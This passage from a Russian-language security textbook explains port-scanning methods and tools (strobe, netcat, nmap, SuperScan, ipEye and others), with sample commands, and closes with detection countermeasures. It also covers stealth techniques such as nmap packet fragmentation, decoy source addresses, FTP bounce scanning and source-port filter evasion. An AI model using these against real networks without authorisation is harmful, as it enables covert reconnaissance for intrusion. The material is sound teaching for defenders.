    •  TCP-сканирование подключением (TCP connect scan). При таком типе сканирования осуществляется попытка подключения по протоколу TCP к интересующему нас порту с прохождением полной процедуры согласования параметров (handshake), состоящей в обмене сообщениями SYN, SYN/ACK и АСК. Попытки такого сканирования очень легко выявляются. На рис. 2.2 показана диаграмма обмена сообщениями в процессе согласования параметров.
    •  TCP-сканирование с помощью сообщений SYN (TCP SYN scan). Этот метод называется также сканированием с незавершенным открытием сеанса (half-open scanning), так как при его использовании полное TCP-соединение не устанавливается. Вместо этого на исследуемый порт отправляется сообщение SYN. Если в ответ поступает сообщение SYN/ACK, это означает, что данный порт находится в состоянии LISTENING. Если же ответ приходит в виде сообщения RST/ACK, то, как правило, это говорит о том, что исследуемый порт отключен. Получив ответ, компьютер, выполняющий сканирование, отправляет исследуемому узлу сообщение RST/ACK, поэтому полное соединение не устанавливается. Этот метод обеспечивает более высокую скрытность по сравнению с полным подключением. Многие системы не регистрируют такие попытки, поэтому они довольно часто могут оставаться незамеченными.



    Рис. 2.2. При установке TCP-соединения происходит обмен тремя сообщениями: (1) клиент отправляет серверу пакет SYN, (2) получает от сервера пакет SYN/ACK и (3) отправляет серверу пакет АСК

    •  TCP-сканирование с помощью сообщений FIN (TCP FIN scan). В этом случае исследуемой системе отправляется пакет FIN. Согласно документу RFC 793 (http://www.ieff.org/rfc/rfc0793.txt), в ответ узел должен отправить пакет RST для всех закрытых портов. Данный метод срабатывает только для стека протоколов TCP/IP, реализованного в системе UNIX.
    •  TCP-сканирование по методу "рождественской елки" (TCP Xmax Tree scan). При использовании данного метода на исследуемый порт отправляются пакеты FIN, URG и PUSH. Согласно документу RFC 793, исследуемый узел в ответ должен отправить сообщения RST для всех закрытых портов.
    •  TCP нуль-сканирование (TCP Null scan). Этот метод состоит в отправке пакетов с отключенными флагами. Согласно RFC 793, исследуемый узел должен ответить отправкой сообщения RST для всех закрытых портов.
    •  TCP-сканирование с помощью сообщений АСК (TCP ACK scan). Этот метод позволяет получить набор правил, используемых брандмауэром. Такое сканирование поможет определить, выполняет ли брандмауэр простую фильтрацию пакетов лишь определенных соединений (пакетов с установленным флагом АСК) или обеспечивает расширенную фильтрацию поступающих пакетов.
    •  TCP-сканирование размера окна (TCP Windows scan). Такой метод позволяет выявить открытые, а также фильтруемые/нефильтруемые порты некоторых систем (например, AIX и FreeBSD), в зависимости от полученного размера окна протокола TCP.
    •  TCP-сканирование портов RFC (TCP RFC scan). Этот метод применим только для систем UNIX и используется для выявления портов RFC (Remote Procedure Call — удаленный вызов процедур), связанных с ними программ и их версий.

    А UDP-сканирование (UDP scan). Данный метод заключается в отправке на исследуемый узел пакетов по протоколу UDP. Если в ответ поступает сообщение о том, что порт ICMP недоступен (ICMP port unreachabie), это означает, что соответствующий порт закрыт. С другой стороны, если такого сообщения нет, можно предположить, что данный порт открыт. В связи с тем, что протокол UDP не гарантирует доставки, точность данного метода очень сильно зависит от множества факторов, влияющих на использование системных и сетевых ресурсов. Кроме того, UDP-сканирование — очень медленный процесс, что особенно сказывается при попытках сканирования устройств, в которых реализован мощный алгоритм фильтрации пакетов. Поэтому, планируя использовать UDP-сканирование, приготовьтесь к тому, что результаты могут оказаться ненадежными.
    Некоторые реализации IP-протокола обладают одним неприятным свойством: пакеты RST отправляются обратно для всех сканируемых портов независимо от того, находятся ли соответствующие порты в режиме ожидания запросов. Учитывайте этот факт при использовании описанных методов. Однако в то же время сканирование подключением и сканирование с использованием сообщений SYN могут применяться для всех узлов.


    2.gif

    Изображение: 

    4. Идентификация запущенных TCP- и UDP-служб



    Идентификация запущенных TCP- и UDP-служб


    Использование хорошей утилиты сканирования портов — важнейший этап сбора информации об исследуемой сети. Хотя для этих целей существует много различных программ, ориентированных как на платформу UNIX, так и на платформу Windows NT, мы ограничимся рассмотрением лишь самых популярных и проверенных временем сканеров.

    strobe



    Утилита strobe — это общепризнанный и популярный TCP-сканер портов, написанный Джулианом Ассанжем (Julian Assange) (ftp://ftp.FreeBSD.org/pub/ FreeBSD/ports/distfiles/strobe-l.06.tgz). Она стала известной уже довольно давно и, вне всякого сомнения, считается одной из самых быстрых и надежных утилит этого класса. К основным возможностям утилиты strobe относится оптимизация системных и сетевых ресурсов, а также сканирование исследуемой системы с максимальной эффективностью. Помимо высокой эффективности, утилита strobe версии 1.04 и выше может собирать идентификационные маркеры (если, конечно, они имеются), связанные с каждым проверяемым портом. Эта информация может оказаться полезной при определении операционной системы, а также запущенных на компьютере службах. Подробнее процесс сбора маркеров (banner grabbing) будет рассматриваться в главе 3.
    В данных, выводимых утилитой strobe, имеется информация о каждом прослушанном порте TCP.

    [tsunami] strobe 192.168.1.10
    strobe 1.03 © 1995 Julian Assange (proff@suburbia.net).
    192.168.1.10 echo 7/tcp Echo [95,JBP]
    192.168.1.10 discard 9/tcp Discard [94,JBP]
    192.168.1.10 sunrpc 111/tcp rpcbind SUN RFC
    192.168.1.10 daytime 13/tcp Daytime [93,JBP]
    192.168.1.10 chargen 19/tcp ttytst source
    192.168.1.10 ftp 21/tcp File Transfer [Control] [96,JBP]
    192.168.1.10 exec 512/tcp remote process execution;
    192.168.1.10 login . 513/tcp remote login a la telnet;
    192.168.1.10 cmd 514/tcp shell like exec, but automatic
    192.168.1.10 ssh 22/tcp Secure Shell
    192.168.1.10 telnet 23,/tcp Telnet [112,JBP]
    192.168.1.10 smtp 25/tcp Simple Mail Transfer [102,JBP]
    192.168.1.10 nfs 2049/tcp networked file system
    192.168.1.10 lockd 4045/tcp
    192.168.1.10 unknown 32772/tcp unassigned
    192.168.1.10 unknown 32773/tcp unassigned
    192.168.1.10 unknown 32778/tcp unassigned
    192.168.1.10 unknown 32799/tcp unassigned
    192.168.1.10 unknown 32804/tcp unassigned

    Хотя в большинстве случаев утилита strobe предоставляет точные данные, все же важно помнить о некоторых ее ограничениях. Во-первых, данная утилита выполняет TCP-сканирование, не поддерживая сканирование по протоколу UDP. Поэтому в некоторых случаях можно получить лишь половину требуемой информации. Во-вторых, при соединении с каждым портом утилита strobe выполняет лишь TCP-сканирование подключением. Хотя именно этим и объясняется высокая надежность получаемых результатов, в то же время использование утилиты strobe очень легко выявить на исследуемой системе. Поэтому необходимо рассмотреть и другие утилиты сканирования, лишенные указанных недостатков.

    udp_scan



    Для UDP-сканирования, которого не выполняет strobe, можно воспользоваться утилитой udp_scan, которая изначально входила в пакет SATAN (Security Administrator Tool for Analyzing Networks), написанный Дэном Фармером (Dan Farmer) и Вайетсом Венема (Wietse Venema) в 1995 году. Хотя сам пакет SATAN несколько устарел, входящие в его состав утилиты по-прежнему можно использовать. Кроме того, по адресу http://wwdsilx.wwdsi.com можно получить новую версию пакета SATAN, которая теперь называется SAINT. Несмотря на наличие множества других утилит UDP-сканирования, мы пришли к выводу, что udp_scan — одна из самых надежных утилит, позволяющая получать достоверные результаты. Правда, необходимо сказать также о том, что, несмотря на высокую надежность утилиты udp_scan, у нее имеется и один существенный недостаток. Эта утилита не может противостоять контратаке какого-либо из пакетов IDS, который осведомлен о методах, используемых в пакете SATAN для сканирования портов. Таким образом, если сканирование необходимо выполнить более скрытно, поишите какое-нибудь другое средство. Обычно с помощью утилиты udp_scan проверяются порты с номерами, меньшими 1024, а также некоторые определенные порты с большими номерами.

    ;tsunami] udp_scan 192.168.1.1 1-1024
    -: 2 : UNKNOWN: 5 3:UNKNOWN: 123:UNKNOWN: 135:UNKNOWN:

    netcat



    Еще одной прекрасной утилитой является netcat (или nc), написанная Хоббитом (Hobbit, hobbit@avian.org). Эта утилита может выполнять так много различных задач, что была названа нами "швейцарским армейским ножом". Помимо остальных возможностей, о которых мы еще не раз будем говорить на протяжении всей книги, утилита nc позволяет применять основные методы TCP- и UDP-сканирования. Степенью детализации выводимых данных можно управлять с помощью параметров -v и -vv, которые включают, соответственно, режимы подробного и очень подробного отображения результатов. Параметр -z применяется для включения режима нулевого ввода-вывода (zero mode I/O), используемого для сканировании портов, а параметр -..2 позволяет задать для каждого соединения интервал ожидания. По умолчанию утилита пс выполняет TCP-сканирование, а для UDP-сканирования необходимо использовать параметр -и (как показано во втором примере).

    tsunami] nc -v -z -w2 192.168.1.1 1-140
    192.168.1.1] 139 (?) open
    192.168.1.1] 135 (?) open
    192.168.1.1] 110 (pop-3) open
    [192.168.1.1] 106 (?) open
    [192.168.1.1] 81 (?) open
    [192.168.1.1] 80 (http) open
    [192.168.1.1] 79 (finger) open
    [192.168.1.1] 53 (domain) open
    [192.168.1.1] 42 (?) open
    [192.168.1.1] 25 (smtp) open
    [192.168.1.1] 21 (ftp) open
    [tsunami] nc -u -v -z -w2 192.168.1.1 1-140
    [192.168.1.1] 135 (ntportmap) open
    [192.168.1.1] 123 (ntp) open
    [192.168.1.1] 53 (domain) open
    [192.168.1.1] 42 (name) open

    nmap



    Рассмотрев простейшие средства сканирования портов, давайте перейдем к обсуждению возможностей безусловного лидера этой категории — утилиты nmap. Данная утилита, разработанная Федором (Fyodor) (http://www.insecure.org/nmap), обладает не только базовыми возможностями TCP- и UDP-сканирования, но и поддерживает все остальные упоминавшиеся выше методы. Очень редко можно найти утилиту, которая предоставляла бы столь богатый набор возможностей в одном пакете. Итак, запустим утилиту и посмотрим, какие возможности она предоставляет.

    [tsunami]# nmap -h
    nmap V. 2.53 Использование:
    nmap [Тип(ы) сканирования] [Параметры]
    <Список узлов или подсетей>
    Некоторые стандартные типы сканирования
    (При использовании параметров, отмеченных символом '*',
    требуются привилегии root)
    -sT TCP-сканирование подключением
    (устанавливается по умолчанию) * -sS TCP-сканирование
    с помощью сообщений SYN
    (среди всех методов TCP-сканирования является наилучшим)
    * -sU UDP-сканирование
    -sP ping-прослушивание
    (выполняется поиск всех достижимых узлов)
    * -sF,-sX,-sN сканирование с помощью сообщений FIN,
    по методу "рождественской елки" и
    нуль-сканирование,
    соответственно (рекомендуется
    использовать только опытным пользователям)
    -SR/-I сканирование с использованием демона
    RPC/identd (применяется совместно с другими типами
    сканирования)
    Некоторые стандартные параметры
    (являются необязательными, могут комбинироваться друг с другом):
    * -О режим изучения пакетов TCP/IP
    с целью определения типа удаленной операционной системы
    -р <диапазон> — диапазон портов,
    которые будут сканироваться.
    Пример диапазона: '1-1024,1080,6666,31337'
    -F Выполняется сканирование портов,
    перечисленных в файле /etc/services
    -v Режим вывода подробной информации.
    Рекомендуется всегда использовать этот параметр.
    Для включения режима вывода очень
    подробной информации используйте параметр -vv
    -РО Отключение проверки активности узла
    с помощью утилиты ping (применяется
    для сканирования таких узлов,
    как www.microsoft.com и аналогичных)
    * -Ddecoy_hostl,decoy2[,...]
    Скрытое сканирование с указанием нескольких ложных адресов узлов
    -Т <Paranoici I Sneaky|Polite|Normal[Aggressive IInsane>
    Принятая политика ожидания
    отклика от удаленного узла
    -n/-R Никогда не выполнять разрешение имен DNS/
    Всегда выполнять [по умолчанию: имена разрешаются
    при необходимости] -oN/-oM <logfile>
    Вывести результаты сканирования в файл <logfile> в
    удобочитаемом/машинном формате -iL <inputfile>
    Взять IP-адреса или имена узлов из файла <inputfiie>.
    Для использования стандартного потока ввода stdin укажите '-'
    * -S <your_IP>/-e <devicename>
    позволяет указать исходный IP-адрес или устройство
    --переход в интерактивный режим
    (затем для получения справки нужно нажать клавишу h)
    [tsunami] nmap -sS 192.168.1.1
    Starting nmap V. 2.53 by fyodor@insecure.org
    Interesting ports on (192.168.1.11):
    (The 1504 ports scanned but
    not shown below are in state: closed)
    Port State Protocol Service
    21 open tcp ftp
    25 open tcp smtp
    42 open tcp nameserver
    53 open tcp domain
    79 open tcp finger
    80 open tcp http
    81 open tcp hosts2-ns
    106 open tcp popSpw
    110 open tcp pop-3
    135 open tcp loc-srv
    139 open tcp netbios-ssn
    443 open tcp https

    Помимо вышеуказанных, утилита nmap предоставляет и другие полезные возможности, заслуживающие детального обсуждения. Так, в приведенном выше примере мы ис-ПОЛЬЗОЕИЛИ параметры командной строки, при которых осуществлялось сканирование одного узла. Однако утилита nmap с такой же легкостью позволяет сканировать и всю сеть. Как легко заметить, nmap поддерживает описания диапазонов адресов в нотации CIDR (Classless Inter-Domain Routing — бесклассовая маршрутизация доменов Internet), описанной в RFC 1519 (http://www.ietf.org/rfc/rfcl519.txt). В этом формате очень легко задавать диапазоны адресов вида 192.168.1.1-192.168.1.254. Полученную информацию можно сохранить в обычном текстовом файле с помощью параметра -о. При указании параметра -oN результаты будут сохранены в удобочитаемом формате.
    [tsunar.i]# ranap -sF 192.168.1.0/24 -oN outfile
    Если выводимые данные нужно сохранить в файле, в котором в качестве разделителей используются символы табуляции (например, чтобы впоследствии программно анализировать полученную информацию), используйте параметр -оМ. В любом случае при сканировании сети, скорее всего, будет получено очень много информации, поэтому имеет смысл сохранить результаты в любом из форматов. В некоторых случаях целесообразно сохранять их сразу в обоих форматах, используя как параметр -ON, так и -оM.
    Предположим, что после сбора предварительных данных о сети организации мы пришли к выводу, что в качестве основного брандмауэра в ней используется простое устройство, выполняющее фильтрацию пакетов. В этом случае можно воспользоваться параметром -f утилиты nmap, чтобы включить режим фрагментации пакетов. Очевидно, что это приведет к отделению заголовков TCP-пакетов от самих пакетов, что затруднит для устройств управления доступом или систем IDS возможность выявления попытки сканирования. В большинстве случаев современные устройства фильтрации пакетов и брандмауэры прикладного уровня, прежде чем осуществлять анализ пакетов IP, помещают все фрагменты в очередь. Однако при использовании более старых моделей устройств управления доступом или устройств, в которых соответствующие функции были отключены для повышения производительности, дефрагментация не выполняется и пакеты передаются дальше во внутреннюю сеть в том виде, в котором они поступают.
    Если архитектура системы безопасности исследуемой сети и ее узлов была хорошо продумана, то эта система без особого труда выявит сканирование, осуществляемое с помощью приведенных выше примеров. Для таких случаев утилита nmap предоставляет дополнительные возможности маскирования, предназначенные для заполнения системных журналов исследуемого узла избыточной информацией. Данный режим включается с помощью параметра -D. Главная идея данного подхода состоит в том, чтобы во время выполнения реального сканирования создать видимость одновременного сканирования из других указанных в командной строке адресов. Для того чтобы воспрепятствовать такому сканированию, системе безопасности исследуемого узла придется проверить все записи, чтобы выяснить, какие из полученных IP-адресов источников сканирования являются реальными, а какие — фиктивными. При использовании данного метода нужно удостовериться в том, что IP-адреса, выступающие в качестве маскировочных, принадлежат реальным узлам, которые в момент сканирования подключены к Internet. В противном случае исследуемая система будет не в состоянии обработать все сообщения SYN, в результате чего возникнет условие DoS.

    [tsunami] nmap -sS 192.168.1.1 -D 10.1.1.1
    www.target_web.com,ME -p25,139,443
    Starting nmap V. 2.53 by fyodor@insecure.org
    Interesting ports on (192.168.1.1):
    Port State ' Protocol Service
    25 open tcp smtp
    443 open tcp https
    Nmap run completed -- 1 IP address (1 host up) scanned in 1 second

    В приведенном примере параметры, введенные в командной строке утилиты nmap, обеспечивают сканирование в режиме, затрудняющем обнаружение реального адреса сканирующего узла.
    Еще одним полезным методом является сканирование с целью идентификации запущенных процессов (подробнее о нем говорится в RFC 1413, http://www.ieff.org/rfc/rfcl413.txt). Этот тип сканирования, называемый ident-сканированием, предназначен для определения пользователя путем установления TCP-соединения с портом 113. Очень часто в ответ приходит сообщение, содержащее идентификатор владельца процесса, связанного с данным портом. Однако этот метод годится лишь для исследования систем UNIX.

    [tsunami] nmap -I 192.168.1.10
    Starting nmap V. 2.53 by fyodor@insecure.org
    Port State Protocol Service Owner
    22 open tcp ssh root
    25 open tcp smtp root
    80 open tcp http root
    110 open tcp pop-3 root
    113 open tcp auth root
    6000 open tcp Xll root

    В приведенном выше фрагменте показано, как идентифицируются владельцы всех обнаруженных процессов. Опытный читатель должен обратить внимание на то, что Web-сервер принадлежит не пользователю nobody, как это должно быть в соответствии с элементарными правилами обеспечения безопасности, а пользователю root, что является вопиющим нарушением. Выполнив идентификацию процессов и установив такой интересный факт, можно заключить, что взломщик, которому удастся проникнуть через систему защиты Web-сервера, получит полный контроль над данным компьютером.
    Последний метод, на котором мы остановимся, называется сканированием с прорывом по FTP (FTP bounce scanning). Этот метод впервые был описан Хоббитом (Hobbit). В своей статье, опубликованной в электронном бюллетене Bugtraq в 1995 году, он осветил некоторые скрытые недостатки протокола FTP (RFC 959, http://www.ietf.org/rfc/rfc0959.txt). Кратко данный метод можно описать как скрытное подключение через FTP-сервер, используя поддержку proxy-серверов, реализованную на этом FTP-сервере. Как отмечает Хоббит в вышеупомянутой статье, прорыв по FTP "можно использовать практически для неотслеживаемой отправки электронной почты и сообщений в группы новостей, взлома серверов различных сетей, заполнения диска, попыток прорыва через брандмауэры и другой вредоносной деятельности, которая при этом может оставаться практически незамеченной". Добавим, что с помощью прорыва по FTP можно сканировать порты, чтобы скрыть свой адрес, и, что еще более важно, обходить устройства управления доступом.
    Конечно, утилита nmap поддерживает и этот режим сканирования (параметр -b). Однако для его выполнения необходимо соблюдение нескольких условий. Во-первых, на FTP-сервере должен быть каталог, доступный для чтения/записи со стороны любого пользователя, например /incoming. Во-вторых, FTP-сервер должен принять от утилиты nmap заведомо неправильную информацию о порте с помощью команды PORT. Хотя этот метод очень эффективен для проникновения через устройства управления доступом, а также для сокрытия своего адреса, у него есть один существенный недостаток — слишком низкая скорость работы. Кроме того, многие современные FTP-серверы просто запрещают выполнение таких операций.
    Однако применение различных средств для сканирования портов — это только половина задачи. Теперь нужно разобраться с тем, как проанализировать данные, полученные с помощью каждой из утилит. Независимо от применяемого средства, необходимо идентифицировать открытые порты, поскольку их перечень позволит определить операционную систему удаленного узла. Например, если на узле открыты порты 135 и 139, то, скорее всего, этот узел работает под управлением операционной системы Windows NT. Обычно Windows NT опрашивает порты 135 и 139, тогда как Windows 95/98 — лишь порт 139.
    Например, изучив результаты, полученные во время работы утилиты strobe, которая рассматривалась выше в этой главе, можно заключить, что исследовавшийся в рассматриваемом примере узел работает под управлением операционной системы из семейства UNIX. Данный вывод можно сделать на основании того, что на исследуемом узле открыты порты с номерами 111 (portmapper), 512-514 (службы Berkley R), 2049 (NFS), а также порты с номерами 3277Х, что характерно именно для систем семейства UNIX. Более того, можно также предположить, что данная операционная система относится к семейству Solaris — именно этой системе присуще использование служб RPC вместе с портам из этого диапазона. Нужно подчеркнуть, что это лишь предположения, поскольку в действительности установленная операционная система, если с ее настройкой поработал опытный администратор безопасности, может лишь "выдавать себя" за Solaris, а в действительности не иметь с ней ничего общего.
    Итак, после завершения TCP- и (или) UDP-сканирования портов уже можно выдвинуть предположения о типе операционной системы, работающей на исследуемом узле, и, следовательно, о том, как можно проникнуть на этот узел. Например, если на сервере Windows NT открыт порт 139, то такой узел подвергается очень высокой степени риска. Подробнее о скрытых недостатках системы защиты Windows NT, а также о том, как с помощью порта 139 можно проникнуть в систему, в которой не приняты адекватные контрмеры для защиты этого порта, рассказывается в главе 5. Рассматривавшаяся в качестве примера система UNIX, скорее всего, также подвергается большому риску, поскольку выявленные нами работающие службы предоставляют в распоряжение удачливого взломщика очень большие возможности. Например, использование служб удаленного вызова процедур (RPC — Remote Procedure Call) и поддержки сетевой файловой системы (NFS — Network File System) являются двумя основными методами проникновения через систему защиты сервера UNIX (подробнее см. главу 8). С другой стороны, если служба RPC не находится в режиме ожидания запросов, то проникнуть через ее систему защиты практически невозможно. Именно поэтому так важно помнить, что чем больше служб работает на компьютере, тем большему риску он подвергается.


    5. Утилиты сканирования портов для системы Windows



    Утилиты сканирования портов для системы Windows


    В предыдущих разделах были рассмотрены утилиты сканирования портов с точки зрения пользователя UNIX, однако неужели не существует аналогичных средств, доступных для пользователей Windows? Конечно же, это не так. Следующие утилиты сканирования портов являются лучшими среди подобных средств, поскольку обладают высокой скоростью, точностью и широким набором функциональных возможностей.

    NetScanTools Pro 2000



    Одним из наиболее универсальных средств исследования сетей, доступных в настоящее время, является пакет NetScanTools Pro 2000 (NSTP2K), содержащий самые разнообразные утилиты, объединенные общим интерфейсом. С использованием NSTP2K можно генерировать запросы DNS, включая nslookup, dig и axf r, запросы whois, осуществлять ping-прослушивание, сканировать таблицы имен NetBIOS, отслеживать сообщения SNMP и выполнять многие другие задачи. Более того, с использованием пакета NetScanTools Pro 2000 можно выполнять несколько задач одновременно. Например, можно выполнять сканирование портов одной сети и осуществлять ping-прослушивание другой сети (хотя мы не можем ручаться за правильность таких действий по отношению к большим сетям).
    В состав пакета NetScanTools Pro 2000 включен также один из лучших сканеров портов Windows. Все необходимые параметры можно установить во вкладке Port Probe. К преимуществам утилиты сканирования NSTP2K. можно отнести возможность гибкого задания параметров исследуемых узлов и портов (и IP-адреса и список портов могут быть импортированы из текстовых файлов), возможность TCP- и UDP-сканирования (хотя соответствующие режимы нельзя установить отдельно для каждого порта), а также высокую скорость благодаря реализации многопоточности. К недостаткам утилиты сканирования пакета NSTP2K можно отнести некоторую громоздкость получаемых результатов, что затрудняет их анализ с помощью сценариев, и, кроме того, графический интерфейс делает невозможным применение этой утилиты в сценариях. Нам хотелось бы высказать следующее пожелание: было бы очень удобно, чтобы результаты, полученные с использованием одной утилиты пакета NSTP2K (скажем, NetScanner), можно было бы напрямую передавать другой утилите (например, Port Probe).
    В общем, пакет NSTP2K (http://www.nwpsw.com) представляет собой профессионально разработанный программный продукт, который регулярно обновляется посредством сервисных пакетов, однако все же остается несколько дорогостоящим по сравнению с предоставляемыми им возможностями. Можно также познакомиться с менее робастной версией Netscan Tools (в настоящее время доступна версия 4), являющейся пробной 30-дневной версией пакета NSTP2K. Однако предоставляемые ею возможности не столь широки, как у пакета Pro 2000 (например, она не позволяет выполнять UDP-сканирование).
    При использовании пакета NSTP2K не забудьте отключить сервер идентификации во вкладке IDENT Server, чтобы не запрещать прослушивание порта 113. На рис. 2.3 показан комплект утилит NSTP2K. в действии при сканировании сети среднего размера.

    SuperScan



    Утилита SuperScan, написанная Робином Кейром (Robin Keir) (http: //members. home.com/rkeir/software.html), является еще одной быстрой и гибкой утилитой TCP-сканирования портов и имеет гораздо более привлекательную стоимость — она распространяется бесплатно! Как и пакет NSTP2K, утилита SuperScan позволяет гибко задавать перечень IP-адресов исследуемых узлов и сканируемых портов. Особенно удобно использовать режим Extract from file (рис. 2.4). Лучше всего особенности его применения описаны в справочной системе. Вот небольшой фрагмент из справочной системы утилиты SuperScan, из которого видно, что она позволяет сэкономить значительную часть времени.



    Рис. 2.3. NetScan Tools Pro 2000 является одним из самых быстрых и гибких средств исследования/сканирования сетей на базе системы Windows



    Рис. 2.4. Утилита SuperScan позволяет извлекать адреса из файла, и эта возможность является очень удобной. Просто задайте имя любого текстового фата, и утилитой будут импортированы имена узлов и IP-адреса из нескольких файлов, а также выполнена подготовка к сканированию портов

    "Режим [The "Extract from file" feature scans] позволяет просматривать содержимое любого текстового файла и извлекать из него корректные IP-адреса и имена узлов. При поиске корректных имен программой выполняются достаточно интеллектуальные действия. Однако перед обработкой файла из него нужно удалить потенциально неоднозначные фрагменты текста, воспользовавшись внешним текстовым редактором. На кнопках Browse и Extract можно щелкать столько раз, сколько различных файлов имеется в вашем распоряжении. При этом в список имен исследуемых узлов программой будут добавлены все новые имена. Все повторяющиеся элементы будут автоматически удалены. После нахождения всех имен узлов щелкните на кнопке Resolve, чтобы преобразовать их в числовые IP-адреса и выполнить подготовку к этапу сканирования портов."
    Невозможно проиллюстрировать возможности утилиты SuperScan лучше, чем это сделано на рис. 2.4. Эта утилита предоставляет также один из наиболее обширных списков портов, с которым нам когда-либо приходилось встречаться. (Авторам книги нравится список под названием henss.lst. Более того, в исходном англоязычном названии книги первые буквы составляют аббревиатуру HENSS&S, откуда можно заключить, что авторы — просто фанаты этого списка.) Кроме того, порты можно выделить или отменить их выделение вручную. Не лишний раз повторить, что утилита SuperScan помимо всех перечисленных возможностей обладает также и высокой скоростью.

    NTOScanner



    Утилита NTOScanner компании NTObjectives, Inc. (http://www.ntobjectives.com) представляет собой быструю программу TCP-сканирования с графическим интерфейсом, которая при ручной установке соответствующего режима позволяет также собирать маркеры портов, находящихся в состоянии ожидания запросов. Однако эта утилита имеет некоторые неудобства при задании исследуемых узлов и портов, а также требует, чтобы перед сканированием сетей класса С к узлам было применено ping-прослушивание. Утилита NTOScanner чрезвычайно полезна для определения служб, запущенных на конкретном узле или в сети, достижимой с помощью ICMP-пакетов. На рис. 2.5 показана утилита NTOScanner в процессе получения маркеров с удаленного зашумленного узла.

    WinScan



    Утилита WinScan компании Scan Mathias of Prosolve (http://www.prosolve.com) является свободно распространяемой программой TCP-сканирования портов, реализованной в двух версиях: с графическим интерфейсом (winscan.exe) и для использования в командной строке (scan.exe). Мы регулярно обращаемся к версии для командной строки в файлах сценариев, поскольку при сканировании сетей класса С она позволяет получить удобные для анализа результаты. При использовании утилит Win32 strings, tee и tr компании Mortice Kern Systems, Inc. (http://www.mks.com) следующая консольная команда NT будет выполнять сканирование сети для портов из диапазона 0-1023 и формировать результат в виде строк с полями, разделенными двоеточиями, в формате IP-адрес:имя_службы: порт/протокол (для облегчения восприятия строка была разделена на две части).

    scan.exe -n 192.168.7.0 -s 0 -е 1023 -f|strings|findstr/с:"/top"|
     tr \011\040 : | tr -s ::|tee -ia results.txt

    Параметр -f при медленных соединениях лучше не использовать, поскольку полученные результаты могут оказаться не очень надежными. При запуске приведенной выше команды будут получены примерно следующие данные.

    192.168.22.5:nbsession:139/tcp
    192.168.22.16:nbsession:139/tcp
    192.168.22.32:nbsession:139/tcp

    Большое спасибо Патрику Хейму (Patrick Heim) и Ясону Глассбергу (Jason Glassberg) за предоставление этой интересной команды.
    ipEye
    Не думаете ли вы, что для выполнения нетрадиционного сканирования потребуется система Linux и утилита nmap? He торопитесь с выводами, поскольку утилита ipEye Арни Видстрома (Arne Vidstrom)'(http: //ntsecurity.nu) позволяет выполнить сканирование требуемых портов, а также TCP-сканирование с помощью сообщений SYN, FIN и с использованием метода "рождественской елки", из командной строки Windows. На использование этой прекрасной утилиты накладывается лишь несколько ограничений. Они заключаются в том, что ее можно использовать только в среде Windows 2000 и одновременно сканировать один узел. Вот пример запуска утилиты ipEye для выполнения TCP-сканирования с помощью сообщений SYN порта с номером 20. При этом предпринята попытка избежать правил фильтрации, используемых маршрутизатором. Приведенный пример аналогичен запуску утилиты nmap с параметром -д (для краткости полученные результаты отредактированы).



    Рис. 2.5. После сканирования портов утилита NTOScanner позволяет выполнить сбор маркеров

    С:\Toolbox>ipeye.exe
    192.168.234.110 -syn -p 1 1023 -sp 20

    ipEye 1.1 - (с) 2000, Arne Vidstrom (arne.vidstrom@ntsecurity.nu)
    - http://ntsecurity.nu/toolbox/ipeye/
    1-52 [closed or reject]
    53 [open]
    54-87 [closed or reject]
    88 [open]
    89-134 [closed or reject]
    135 [open]
    136-138 [closed or reject]
    139 [open]
    636 [open]
    637-1023 [closed or reject]
    1024-65535 [not scanned]

    WUPS



    Утилита Windows UDP Port Scanner (WUPS) разработана теми же авторами (http://ntsecurity.nu). Эта утилита представляет собой надежное, с графическим интерфейсом и относительно быстрое средство сканирования UDP-портов, несмотря на то, что позволяет одновременно сканировать заданную последовательность портов лишь одного узла. Как видно из рис. 2.6, утилита WUPS является надежным средством для быстрого UDP-сканирования каждого требуемого узла и, следовательно, значительно облегчает выполнение этой утомительной задачи.



    Рис. 2.6. Утилитой WUPS обнаружена система, в которой запущена служба SNMP (UDP 161)


    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    6. Защита от сканирования портов



    Защита от сканирования портов


    В табл. 2.2 приведен перечень различных популярных утилит сканирования, а также типы сканирования, которые эти утилиты позволяют выполнять.

    Контрмеры: защита от сканирования портов



    Выявление факта сканирования
    Как правило, взломщики прибегают к сканированию TCP- и UDP-портов удаленного компьютера, чтобы установить, какие из них находятся в состоянии ожидания запросов. Поэтому выявить факт сканирования — значит, установить, в каком месте и кем будет предпринята попытка взлома. Основные методы выявления факта сканирования состоят либо в использовании специальной программы, предназначенной для выявления вторжений на уровне сети (IDS), такой как NFR, либо в использовании механизма защиты на уровне отдельного узла.

    Таблица 2.2. Популярные утилиты сканирования портов и их возможности


     
      Утилита
    Сканирование
      Ресурс
      UNIX
      TCP 
      UDP    Скрытое
          ftp://f tp.FreeBSD.org/
    pub/FreeBSD
    /ports/distfiles/strobe-1.06.tgz

          http://wwdsilx.
    wwdsi.com/saint/

      X      http://wwdsilx.
    wwdsi.com/saint/

      X   X http://www. inscure . org/nmap
      X    http://www.10pht.com/
    users/10pht/nc110.tgz

      Windows
    Netcat
      X    http://www.10pht.com/users/
    10pht/ncllnt.zip

      X      http://www.nwpsw.com
          http://members.home.com/
    rkeir/software.html

          http://www.ntobjectives.com
          http://www.prosolve.com
         http://ntsecurity.nu
      X    http://ntsecurity.nu
      X    http://www.foundstone.com

    Метод UDP-сканирования утилиты netcat не работает в операционной системе Windows NT, поэтому пользователям этой ОС не стоит доверять полученным результатам.

    # Алгоритм выявления факта сканирования
    # Автор - Стюарт Мак-Клар (Stuart McClure)
    # Данный алгоритм выявляет неудачные попытки сканирования портов,
    # которые приводят к генерации сообщений ACK/RST.
    В процессе настройки
    # можно поэкспериментировать со значениями
    # maxcount и maxtime.
    port_schema = library_schema:new( 1, ["time", "ip", "ip",
    "int"],
    scope() };
    time = 0;
    count = 0;
    maxcount =2; t Максимально допустимое количество ACK/RST.
    maxtime =5; tt Максимально допустимое время, в течение
    # которого может достигаться значение maxcount.
    source = 0; port = 0; target = 0;
    filter portscan ip ( )
    {
    if (tcp.is)
    (
    # Проверка АСК, RST и источника поступления.
    if ( byte(ip.blob, 13) == 20 )
    # Установлены флаги АСК, RST
    {
    count = count + 1;
    source = ip.dest;
    target = ip.source;
    port = tcp.sport;
    time = system.time;
    } } on tick = timeout
    ( sec: maxtime, repeat )
    call checkout;
    }
    func checkout {
    if (count >= maxcount) {
    echo("Попытка сканирования порта,
    Время: ", time, "\n); record system.time, source, target,
    port to the_recorder_portscan; count = 0; }
    else
    count = 0;
    }
